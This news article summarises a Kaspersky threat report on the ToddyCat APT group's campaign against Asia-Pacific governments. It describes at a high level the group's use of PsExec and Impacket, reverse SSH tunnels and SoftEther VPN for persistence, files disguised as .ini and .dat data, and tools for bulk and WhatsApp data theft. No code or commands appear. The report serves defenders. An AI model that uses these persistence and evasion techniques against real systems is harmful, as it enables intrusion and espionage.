ToddyCat: Unveiling the Stealthy APT Group Targeting Asia-Pacific Governments

ToddyCat APT Group
Diagram of SSH tunnel creation

A new report from Kaspersky Labs reveals a sophisticated toolkit used by the advanced persistent threat (APT) group, “ToddyCat,” to steal massive amounts of sensitive data and maintain control over compromised systems. The group primarily targets governmental organizations throughout the Asia-Pacific region.

ToddyCat‘s operations hinge on securing high-level user credentials, which then facilitate the deployment of an arsenal of tools. These tools, including PsExec and Impacket, allow attackers to remotely connect, transfer, and execute malicious programs across compromised systems. The sophistication and scale of these attacks imply a well-orchestrated effort to automate data theft, ensuring a steady stream of valuable intelligence.

Diagram of SSH tunnel creation | Image: Kaspersky Labs

The cornerstone of ToddyCat’s strategy is maintaining undetected access. By establishing multiple reverse SSH tunnels using tools from the OpenSSH suite for Windows, the group ensures persistent access, even if some tunnels are discovered and shut down. Furthermore, the SoftEther VPN, another tool favored by the group, adds a layer of stealth, enabling secure and covert communication channels that are tough to trace and dismantle.

ToddyCat’s expertise extends to disguising their tools and operations. By renaming executable files and employing scripts to modify system permissions discreetly, they effectively camouflage their presence. Files critical for the SSH connections, for instance, are cleverly disguised with common data file extensions such as .ini and .dat, making them less conspicuous to security personnel.

Beyond maintaining access, ToddyCat is adept at large-scale data harvesting. The group uses tools like cuthead for systematic data collection and WAExp for pilfering WhatsApp data, demonstrating their capability to extract a wide array of information from compromised systems. This includes sensitive governmental communications and documents, which could have significant geopolitical implications.

In response to the persistent threats posed by groups like ToddyCat, Kaspersky Labs recommends several proactive security measures. Organizations are urged to restrict the use of certain remote access tools, rigorously monitor network traffic, and employ advanced detection algorithms that can identify and neutralize such covert operations. Additionally, enhancing user awareness about password security and the risks of data storage in browsers is crucial.